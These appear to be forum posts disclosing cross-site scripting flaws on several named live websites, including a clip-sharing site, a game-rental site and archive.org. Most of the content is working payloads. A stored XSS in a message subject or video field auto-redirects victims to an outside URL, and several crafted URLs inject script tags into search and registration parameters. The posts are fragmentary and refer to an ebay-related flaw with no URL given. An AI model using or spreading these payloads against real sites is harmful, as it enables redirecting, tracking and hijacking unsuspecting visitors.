www.clipshare.com < clipshare software.
Login- Goto Send a message.
send a message with subject & body of:
>"><script>location="hxxp://www.geocities.com/timoleary71/"</script>
if the person tries to open there inbox, they don't even need to click on the message they get auto-redirected.. Also, you can put it inside the "Location Recorded" field of a video upload. Anytime someone tries to view the video...

This was vaguely difficult to find due to some XSS protection in place, some browser dependencies and some unreliable server issues. This company just went public (sounds like a good company too, I might add). The URL is HTTPS, making it slightly more interesting (the XSS exploit works only in IE and pops up infinite alerts as long as your mouse is over the body of the page):

It requires the user to have already visited ebay, or for the request to be reloaded as it is only displayed when there is a history. I need to look at the logic more to see it can be worked around, but figured if someone is interested they can do it ;)

http://www.gamefly.com/products/search.asp?k=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3Cp&pf=&sub=1&sb=mostpop&spsrch.x=0&spsrch.y=0
https://www.gamefly.com/member/reg0.asp?tp=&re=/member/account.asp?&pr=&p=0&gcid=&gctp=0&pue=&fc=&un=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&pw=&forgotpw=0&submit.x=0&submit.y=0
I was only here because I wanted to sign up for an account... but not anymore: http://www.gamefly.com/products/search.asp?k=&pf=0&cat=2&sb=mostpop&pg=1&letter='&s=&t=0&next.x=29&next.y=8

EDIT: Didn't feel like making a new post:
http://tell-a-friend-wizard.com/cgi-bin/tell_opt_gold.cgi?uid=%22%3E%3Cscript%3Ealert%28%27xss1%27%29%3C/script%3E&url=%22%3E%3Cscript%3Ealert%28%27xss2%27%29%3C/script%3E&captcha=%22%3E%3Cscript%3Ealert%28%27xss3%27%29%3C/script%3E

hxxp://www.archive.org/search.php?query=%22%3C%2Ftitle%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
It's actually interesting that i had to put the " first, otherwise it would have remove every <
Some filters are actually strange :/